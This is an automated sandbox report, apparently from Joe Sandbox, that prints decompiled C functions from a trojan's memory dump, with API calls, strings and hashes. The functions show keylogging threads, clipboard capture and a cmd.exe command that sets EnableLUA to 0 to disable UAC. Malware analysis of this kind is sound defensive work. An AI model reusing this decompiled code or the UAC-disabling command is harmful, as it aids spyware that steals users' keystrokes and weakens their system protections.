                									__eflags = _t32;
                									if(_t32 != 0) {
                										goto L19;
                									} else {
                										goto L18;
                									}
                								} else {
                									_push(_t32);
                									goto L14;
                								}
                							} else {
                								_push(_t21);
                								L14:
                								E00445002();
                								L18:
                								SetLastError(_t37);
                							}
                						} else {
                							_t32 = E0044703C(_t25, _t37, _t45, _t9);
                							if(_t32 != 0) {
                								L19:
                								SetLastError(_t37);
                								_t21 = _t32;
                							} else {
                								goto L12;
                							}
                						}
                						return _t21;
                					}
                				} else {
                					_t31 = E0044703C(_t23, _t36, _t42, _t2);
                					if(_t31 != 0) {
                						L8:
                						SetLastError(_t36);
                						return _t31;
                					} else {
                						goto L2;
                					}
                				}
                 			}

                APIs
                • GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                • _free.LIBCMT ref: 00446ACC
                • _free.LIBCMT ref: 00446AF4
                • SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                • SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                • _abort.LIBCMT ref: 00446B13
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID:
                • API String ID: 3160817290-0
                • Opcode ID: 806b9488dbb5f67dc4a24e364a824df2f5f943de60d9707ff7ce2e9c29f9cb7b
                • Instruction ID: 6a8f3ccd0764d1e9e7d83ebdae3328841d1b307594cb58bb8d86c94d160514c2
                • Opcode Fuzzy Hash: 806b9488dbb5f67dc4a24e364a824df2f5f943de60d9707ff7ce2e9c29f9cb7b
                • Instruction Fuzzy Hash: 9FF0D675105B0166F612B325BC06E6B2A558BD3B69F22403BF904E22D2EF6DC806816E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00419601(char _a4) {
                				struct _SERVICE_STATUS _v32;
                				signed int _t16;
                				void* _t19;
                				void* _t20;
                
                				_t16 = 0;
                				_t20 = OpenSCManagerW(0, 0, 0x20);
                				_t19 = OpenServiceW(_t20, E00401EE4( &_a4), 0x20);
                				if(_t19 != 0) {
                					_t16 = 0 | ControlService(_t19, 1,  &_v32) != 0x00000000;
                					CloseServiceHandle(_t20);
                					CloseServiceHandle(_t19);
                				} else {
                					CloseServiceHandle(_t20);
                				}
                				E00401EE9();
                				return _t16;
                 			}

                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041917E,00000000), ref: 00419610
                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041917E,00000000), ref: 00419624
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041917E,00000000), ref: 00419631
                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041917E,00000000), ref: 00419640
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041917E,00000000), ref: 00419652
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041917E,00000000), ref: 00419655
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandle$Open$ControlManager
                • String ID:
                • API String ID: 221034970-0
                • Opcode ID: e6db69cc8be19a6ae9fe5f77aceb0022ff7f1936e362e083b92f1549f5c30de9
                • Instruction ID: a7ca8c43b745447570174616d627e1def875c64aa7390fdce4b26778a5b79433
                • Opcode Fuzzy Hash: e6db69cc8be19a6ae9fe5f77aceb0022ff7f1936e362e083b92f1549f5c30de9
                • Instruction Fuzzy Hash: 4EF0C2315003186BD210AF65AC89DBF3BECDB45BA1F00007AFD09921D2DA28CD4685F9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0041976C(char _a4) {
                				struct _SERVICE_STATUS _v32;
                				signed int _t16;
                				void* _t19;
                				void* _t20;
                
                				_t16 = 0;
                				_t20 = OpenSCManagerW(0, 0, 0x40);
                				_t19 = OpenServiceW(_t20, E00401EE4( &_a4), 0x40);
                				if(_t19 != 0) {
                					_t16 = 0 | ControlService(_t19, 3,  &_v32) != 0x00000000;
                					CloseServiceHandle(_t20);
                					CloseServiceHandle(_t19);
                				} else {
                					CloseServiceHandle(_t20);
                				}
                				E00401EE9();
                				return _t16;
                 			}

                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041907E,00000000), ref: 0041977B
                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041907E,00000000), ref: 0041978F
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041907E,00000000), ref: 0041979C
                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041907E,00000000), ref: 004197AB
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041907E,00000000), ref: 004197BD
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041907E,00000000), ref: 004197C0
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandle$Open$ControlManager
                • String ID:
                • API String ID: 221034970-0
                • Opcode ID: 8c691c4db612222e8f4a2364d94c776417239c4669202b2951e8d2bba5e27784
                • Instruction ID: a5790d775f0640958528a35b07e9f071147c503c7fab8b2ef1513a048adfe726
                • Opcode Fuzzy Hash: 8c691c4db612222e8f4a2364d94c776417239c4669202b2951e8d2bba5e27784
                • Instruction Fuzzy Hash: 62F0C271501218ABD210AF65EC89DBF3BECDF45BA5B00007AFE09921D2DA38CD4685E9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00419705(char _a4) {
                				struct _SERVICE_STATUS _v32;
                				signed int _t16;
                				void* _t19;
                				void* _t20;
                
                				_t16 = 0;
                				_t20 = OpenSCManagerW(0, 0, 0x40);
                				_t19 = OpenServiceW(_t20, E00401EE4( &_a4), 0x40);
                				if(_t19 != 0) {
                					_t16 = 0 | ControlService(_t19, 2,  &_v32) != 0x00000000;
                					CloseServiceHandle(_t20);
                					CloseServiceHandle(_t19);
                				} else {
                					CloseServiceHandle(_t20);
                				}
                				E00401EE9();
                				return _t16;
                 			}

                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004190FE,00000000), ref: 00419714
                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004190FE,00000000), ref: 00419728
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004190FE,00000000), ref: 00419735
                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,004190FE,00000000), ref: 00419744
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004190FE,00000000), ref: 00419756
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004190FE,00000000), ref: 00419759
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandle$Open$ControlManager
                • String ID:
                • API String ID: 221034970-0
                • Opcode ID: f72edf81a8943e434c500194a05c696fe4de80c9056decf97eeda48cf3bd3e0d
                • Instruction ID: 8fc70a690c960e854b45078eaab18319365206aebec4e159bed8ee303a354907
                • Opcode Fuzzy Hash: f72edf81a8943e434c500194a05c696fe4de80c9056decf97eeda48cf3bd3e0d
                • Instruction Fuzzy Hash: 74F0C2715002186BD210AF65AC89DBF3BECDF45BA1F40007AFE09A61D2DB38CD4585E9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E00404CA3(void* __ecx, void* __edx, _Unknown_base(*)()* _a4, signed int _a12) {
                				char _v24;
                				char _v28;
                				char _v40;
                				void* _v44;
                				char _v48;
                				signed int _v52;
                				void* _v56;
                				char _v60;
                				char _v64;
                				intOrPtr _v68;
                				char _v76;
                				char _v80;
                				void* __ebx;
                				void* __esi;
                				void* __ebp;
                				void* _t35;
                				void* _t61;
                				void* _t65;
                				struct _SECURITY_ATTRIBUTES* _t67;
                				signed int _t73;
                				void* _t90;
                				_Unknown_base(*)()* _t92;
                				void* _t94;
                				void* _t96;
                				void* _t97;
                				void* _t98;
                
                				_t90 = __edx;
                				_t97 =  &_v56;
                				_v52 = _v52 & 0x00000000;
                				_t94 = __ecx;
                				 *(__ecx + 0x54) =  *(__ecx + 0x54) & 0x00000000;
                				E004020BF(_t65,  &_v48);
                				_t7 = _t94 + 0x58; // 0x472f38
                				_t35 = _t7;
                				_t92 = _a4;
                				while(E00404EDB(_t94, E00401F8B(_t92),  &_v52, _t35) != 0) {
                					_t73 =  *(_t94 + 0x30) & 0x000000ff;
                					_a12 = _t73;
                					_t96 = _v52 + _t73;
                					if(_t96 <= E0040245C()) {
                						_t67 = 0;
                						__eflags = 0;
                					} else {
                						_t67 = 1;
                						 *((intOrPtr*)(_t94 + 0x54)) = _t96 - E0040245C();
                					}
                					if(_t67 == 0) {
                						E00401FC2( &_v60, _t90, _t94, E00404182(_t92,  &_v24, _a12, 0xffffffff));
                						E00401FB8();
                						E00401FC2( &_v76, _t90, _t94, E00404182( &_v64,  &_v40, 0, _v68));
                						E00401FB8();
                						_t103 = _t67;
                						if(_t67 != 0) {
                							_t25 = _t94 + 0xc; // 0x472eec
                							E00401FA0(_t25,  &_v80);
                							 *(_t94 + 0x24) = CreateEventA(0, 0, 0, 0);
                							__eflags = 0;
                							CreateThread(0, 0, _a4, _t94, 0, 0);
                							WaitForSingleObject( *(_t94 + 0x24), 0xffffffff);
                							CloseHandle( *(_t94 + 0x24));
                						} else {
                							_t98 = _t97 - 0x18;
                							E004020D6(_t67, _t98, _t90, _t103,  &_v80);
                							_a4(_t94);
                							_t97 = _t98 + 0x1c;
                						}
                						E00401FC2(_t92, _t90, _t94, E00404182(_t92,  &_v28, _t96, 0xffffffff));
                						E00401FB8();
                						_t61 = E0040245C();
                						_t32 = _t94 + 0x58; // 0x472f38
                						_t35 = _t32;
                						if(_t61 != 0) {
                							continue;
                						}
                					}
                					break;
                				}
                				return E00401FB8();
                 			}

                APIs
                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00472F38), ref: 00404D93
                • CreateThread.KERNEL32 ref: 00404DA7
                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                • String ID: Cqt
                • API String ID: 3360349984-953143165
                • Opcode ID: 8d6fd5db70c64a241ae51ab836ad73aa377c045dbe9deaa06f84a4a2af7550f9
                • Instruction ID: dba95858f974454461b1e2e40e9edd510e178e98119d07c53f81cbb5064a2bb1
                • Opcode Fuzzy Hash: 8d6fd5db70c64a241ae51ab836ad73aa377c045dbe9deaa06f84a4a2af7550f9
                • Instruction Fuzzy Hash: 524194712083016BC711FB61DD55D6FB7EDAFD4314F400A3EB982A22E2DB3899098666
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E0040ACBE(void* __ecx) {
                				char _v28;
                				char _v52;
                				char _v76;
                				char _v100;
                				char _v124;
                				char _v148;
                				void* __ebx;
                				void* __esi;
                				void* __ebp;
                				void* _t23;
                				void* _t27;
                				void* _t30;
                				void* _t78;
                				void* _t84;
                				void* _t85;
                				void* _t86;
                
                				_t86 = _t85 - 0x94;
                				_t78 = __ecx;
                				if( *0x474c4c >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                					E00432CF1(0x474c4c);
                					_t89 =  *0x474c4c - 0xffffffff;
                					if( *0x474c4c == 0xffffffff) {
                						E00401F66(0x474c50, 0x474c50);
                						E0043307B(_t89, E004568E0);
                						E00432CB2(0x474c4c, 0x474c4c);
                					}
                				}
                				E0040AC84( &_v28);
                				_t23 = E0040AF46(0x474c50);
                				_t90 = _t23;
                				if(_t23 == 0) {
                					E0040AE66(0x474c50,  &_v28);
                					_t27 = E00406E2B(_t90);
                					_t91 = _t27;
                					if(_t27 != 0) {
                						E00402073(0x474c50,  &_v76, 0x46a8f0, _t84, "\r\n[End of clipboard]\r\n");
                						E00402073(0x474c50,  &_v52, 0x46a8f0, _t84, "\r\n[Text copied to clipboard]\r\n");
                						_t30 = E0041A7B9( &_v148,  &_v76);
                						E00402F85(_t86 - 0x18, E004042FD(0x474c50,  &_v100, E0041A7B9( &_v124,  &_v52), _t84, _t91, 0x474c50), _t30);
                						E00409BA9(_t78);
                						E00401EE9();
                						E00401EE9();
                						E00401EE9();
                						E00401FB8();
                						E00401FB8();
                					}
                				}
                				return E00401EE9();
                 			}

                APIs
                  • Part of subcall function 0043307B: __onexit.LIBCMT ref: 00433081
                • __Init_thread_footer.LIBCMT ref: 0040AD0D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Init_thread_footer__onexit
                • String ID: [End of clipboard]$[Text copied to clipboard]$LLG$PLG
                • API String ID: 1881088180-1960277357
                • Opcode ID: 6ed8eb49d3fa1ddc00cddfd991b7cd95876bcc44e0819f1619be2c8cf3895d0d
                • Instruction ID: 8d56320deb120d659c296c02e5f33f036aa5d094007c574b007f3df0111b0a83
                • Opcode Fuzzy Hash: 6ed8eb49d3fa1ddc00cddfd991b7cd95876bcc44e0819f1619be2c8cf3895d0d
                • Instruction Fuzzy Hash: 8121A2319102054BCB14FBA6D9829EDB379AF84308F10007FE505731D2EF3C5E4A8A9D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E0040977E(void* __ecx, char* __edx, char _a4) {
                				char _v28;
                				char _v32;
                				void* _v56;
                				void* __ebx;
                				void* __edi;
                				void* __ebp;
                				void* _t21;
                				void* _t39;
                				void* _t41;
                				signed int _t42;
                				void* _t44;
                
                				_t33 = __edx;
                				_t44 = (_t42 & 0xfffffff8) - 0x1c;
                				_push(_t21);
                				_t39 = __ecx;
                				 *((char*)(__ecx + 0x49)) = 1;
                				E0040AE66(__ecx + 0x60,  &_a4);
                				_t48 =  *0x46f9d4 - 0x32;
                				_t35 = "Offline Keylogger Started";
                				if( *0x46f9d4 != 0x32) {
                					E00402073(_t21,  &_v28, __edx, _t41, "Offline Keylogger Started");
                					_t44 = _t44 - 0x18;
                					_t33 =  &_v32;
                					E0041A7B9(_t44,  &_v32);
                					E0040A6DA(_t21, _t39, _t48);
                					E00401FB8();
                				}
                				_t45 = _t44 - 0x18;
                				E00402073(_t21, _t44 - 0x18, _t33, _t41, _t35);
                				E00402073(_t21, _t45 - 0x18, _t33, _t41, "i");
                				E0041A04A(_t21, _t35);
                				CreateThread(0, 0, E00409880, _t39, 0, 0);
                				if( *_t39 == 0) {
                					CreateThread(0, 0, E0040986A, _t39, 0, 0);
                				}
                				CreateThread(0, 0, E0040988C, _t39, 0, 0);
                				return E00401EE9();
                 			}

                APIs
                • CreateThread.KERNEL32 ref: 00409806
                • CreateThread.KERNEL32 ref: 00409816
                • CreateThread.KERNEL32 ref: 00409822
                  • Part of subcall function 0040A6DA: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                  • Part of subcall function 0040A6DA: wsprintfW.USER32 ref: 0040A769
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread$LocalTimewsprintf
                • String ID: Offline Keylogger Started$Cqt
                • API String ID: 465354869-147018579
                • Opcode ID: 903f3273002da4c7dfb9f07f49a9c8e8e5ab117bf22a91f6b3e07eaca02fd2e4
                • Instruction ID: de04d47bbc5f4bbdcfa168c24a1029e81d3d9c9d0fe0406f7b4d0e9c742a0715
                • Opcode Fuzzy Hash: 903f3273002da4c7dfb9f07f49a9c8e8e5ab117bf22a91f6b3e07eaca02fd2e4
                • Instruction Fuzzy Hash: CC1198A25003087AD214BB769C86DBB7A5CDA82398B40457FF845222C3DA785E19C6FE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E0040A6DA(void* __ebx, void* __ecx, void* __eflags, char _a4) {
                				struct _SYSTEMTIME _v20;
                				char _v44;
                				char _v68;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				WCHAR* _t28;
                				void* _t61;
                				void* _t62;
                				void* _t64;
                				void* _t65;
                				void* _t66;
                
                				_t66 = __eflags;
                				_t61 = __ecx;
                				GetLocalTime( &_v20);
                				E00401EF3( &_a4, _t21, _t62, E00402FF4(__ebx,  &_v44, E0040AEF6( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t64,  &_a4), _t61, _t64, _t66, L"]\r\n"));
                				E00401EE9();
                				E00401EE9();
                				_push(0x64 + E0040245C() * 2);
                				_t28 = E0043A620( &_a4);
                				_push(_v20.wSecond & 0x0000ffff);
                				_push(_v20.wMinute & 0x0000ffff);
                				_push(_v20.wHour & 0x0000ffff);
                				_push(_v20.wDay & 0x0000ffff);
                				_push(_v20.wMonth & 0x0000ffff);
                				wsprintfW(_t28, E00401EE4( &_a4));
                				E0040415E(__ebx, _t65, _t21, _t64, _t28);
                				E00409BA9(_t61, _v20.wYear & 0x0000ffff);
                				L0043A61B(_t28);
                				return E00401EE9();
                 			}

                APIs
                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                • wsprintfW.USER32 ref: 0040A769
                  • Part of subcall function 00409BA9: SetEvent.KERNEL32(?,?,00000000,0040A780,00000000), ref: 00409BD5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: EventLocalTimewsprintf
                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                • API String ID: 1497725170-248792730
                • Opcode ID: 654991a9fd8647edca9edf08d2cdd9e4fcc91d62cb7c35fa0fe547339d1e4ec5
                • Instruction ID: 67f2dfcb9da7a84066df1aeb29efb07d6386f75bf98186ef1d39347a66652dd1
                • Opcode Fuzzy Hash: 654991a9fd8647edca9edf08d2cdd9e4fcc91d62cb7c35fa0fe547339d1e4ec5
                • Instruction Fuzzy Hash: 44114272404118AACB18FB96EC968FF77B8EE48315B00012FF842661D1EF7C5A45D6AD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 70%
                			E0041BE1A() {
                				char _v20;
                				struct _WNDCLASSEXA _v68;
                				void* __edi;
                				struct HWND__* _t20;
                				void* _t23;
                
                				E00435760(_t23,  &(_v68.style), 0, 0x2c);
                				_v68.cbSize = 0x30;
                				_v68.style = 0;
                				_v68.lpfnWndProc = E0041BE9A;
                				_v68.cbClsExtra = 0;
                				asm("movsd");
                				_v68.lpszClassName =  &_v20;
                				_v68.cbWndExtra = 0;
                				asm("movsd");
                				_v68.lpszMenuName = 0;
                				asm("movsd");
                				asm("movsw");
                				asm("movsb");
                				if(RegisterClassExA( &_v68) == 0) {
                					L3:
                					return 0;
                				}
                				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
                				if(_t20 == 0) {
                					GetLastError();
                					goto L3;
                				}
                				return _t20;
                 			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ClassCreateErrorLastRegisterWindow
                • String ID: 0$MsgWindowClass
                • API String ID: 2877667751-2410386613
                • Opcode ID: 2c2acc564e7228da8453ef1ef4daccb200bb255fb4852b917a0f25144a291afc
                • Instruction ID: 5840f73649b50f116e6ab49c8ddc39afef87091f1adce936c33ae781c96a4941
                • Opcode Fuzzy Hash: 2c2acc564e7228da8453ef1ef4daccb200bb255fb4852b917a0f25144a291afc
                • Instruction Fuzzy Hash: 0A01E9B190031DABDB10DF95ECC49EFBBBCEB08355F40057AF914A6240E77599058BA5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00406DC9() {
                				struct _PROCESS_INFORMATION _v20;
                				struct _STARTUPINFOA _v92;
                				void* __edi;
                				long _t18;
                
                				_t18 = 0x44;
                				E00435760(0,  &_v92, 0, _t18);
                				_v92.cb = _t18;
                				E00435760(0,  &_v20, 0, 0x10);
                				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
                				CloseHandle(_v20);
                				return CloseHandle(_v20.hThread);
                 			}

                APIs
                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406E0F
                • CloseHandle.KERNEL32(?), ref: 00406E1E
                • CloseHandle.KERNEL32(?), ref: 00406E23
                Strings
                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00406E05
                • C:\Windows\System32\cmd.exe, xrefs: 00406E0A
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CreateProcess
                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                • API String ID: 2922976086-4183131282
                • Opcode ID: 0f52d4b74f975e3f2949df4035c160fbb6b8b2e0bf2a4fef78c5a914e70af107
                • Instruction ID: 771504d0c5622b635381120a699b2d9c6d8516bd8efb25c1479c62c52dadb0bd
                • Opcode Fuzzy Hash: 0f52d4b74f975e3f2949df4035c160fbb6b8b2e0bf2a4fef78c5a914e70af107
                • Instruction Fuzzy Hash: 1DF09676D0029C76CB20ABD7AC0EFDF7F3CEBC5B11F04016AB508A2041D6705010CAB5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00441BBB,?,?,00441B5B,?), ref: 00441C2A
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00441C3D
                • FreeLibrary.KERNEL32(00000000,?,?,?,00441BBB,?,?,00441B5B,?), ref: 00441C60
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: ea4ab4854586bb172daf74edb897d215f2c8ee4f05ba98cc7202b459c056c010
                • Instruction ID: 8f9b3e7d5fe4f03b554215b975d8d256f1185f74086fc6d013083e353006690b
                • Opcode Fuzzy Hash: ea4ab4854586bb172daf74edb897d215f2c8ee4f05ba98cc7202b459c056c010
                • Instruction Fuzzy Hash: 79F06830944318FBDB115F54EC49B9EBFB8EF04756F004175FC05A2261DB788E84CA98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E004050C4(void* __ecx, void* __ebp, char _a4) {
                				void* _t17;
                				void* _t21;
                				void* _t22;
                				void* _t23;
                				void* _t25;
                
                				_t23 = __ecx;
                				if( *((char*)(__ecx + 0x5c)) == 0) {
                					return 0;
                				}
                				if(_a4 == 0) {
                					_t26 = _t25 - 0x18;
                					E00402073(_t17, _t25 - 0x18, _t21, __ebp, "KeepAlive             | Disabled");
                					E00402073(_t17, _t26 - 0x18, _t21, __ebp, "!");
                					E0041A04A(_t17, _t22);
                				}
                				 *(_t23 + 0x64) = CreateEventA(0, 0, 0, 0);
                				SetEvent( *(_t23 + 0x60));
                				WaitForSingleObject( *(_t23 + 0x64), 0xffffffff);
                				CloseHandle( *(_t23 + 0x64));
                				return 1;
                 			}

                APIs
                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405100
                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 0040510C
                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405117
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405120
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                • String ID: KeepAlive | Disabled
                • API String ID: 2993684571-305739064
                • Opcode ID: 54ac682c0df13f07fbc8928149592847e25effe2883c6d2c4aa9bc08f146cb61
                • Instruction ID: 9fcb7412de1a371383c4be032709771db6bfe23be82c7c78edeb32f54ebeba58
                • Opcode Fuzzy Hash: 54ac682c0df13f07fbc8928149592847e25effe2883c6d2c4aa9bc08f146cb61
                • Instruction Fuzzy Hash: E8F096719087107FDB103774AD0AA6F7E98AB16315F00057FF986516E2D5B888509B9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E0041991B(WCHAR* __ecx) {
                				void* __edi;
                				void* _t7;
                				void* _t11;
                				void* _t12;
                				WCHAR* _t14;
                				void* _t16;
                				void* _t17;
                
                				_t18 = _t17 - 0x18;
                				_t14 = __ecx;
                				E00402073(_t7, _t17 - 0x18, _t11, _t16, "Alarm triggered");
                				E00402073(_t7, _t18 - 0x18, _t11, _t16, "!");
                				E0041A04A(_t7, _t12);
                				PlaySoundW(_t14, GetModuleHandleA(0), 0x20009);
                				Sleep(0x2710);
                				return PlaySoundW(0, 0, 0);
                 			}

                APIs
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041994D
                • PlaySoundW.WINMM(00000000,00000000), ref: 0041995B
                • Sleep.KERNEL32(00002710), ref: 00419962
                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041996B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: PlaySound$HandleLocalModuleSleepTime
                • String ID: Alarm triggered
                • API String ID: 614609389-2816303416
                • Opcode ID: 13be5a314f47b5be99a2dc760bbc57afffc3dda2b1f88ff1863d5b7f6b116ace
                • Instruction ID: 8069d90e893f75e5c908224cd3dcb2ae2e93304f9117e242fbfb21d481eb26c4
                • Opcode Fuzzy Hash: 13be5a314f47b5be99a2dc760bbc57afffc3dda2b1f88ff1863d5b7f6b116ace
                • Instruction Fuzzy Hash: 0CE01A26A4822037A510336BBD0FD6F2D29DAC7B62B0101BFFA05661E29D98085196FB
                Uniqueness

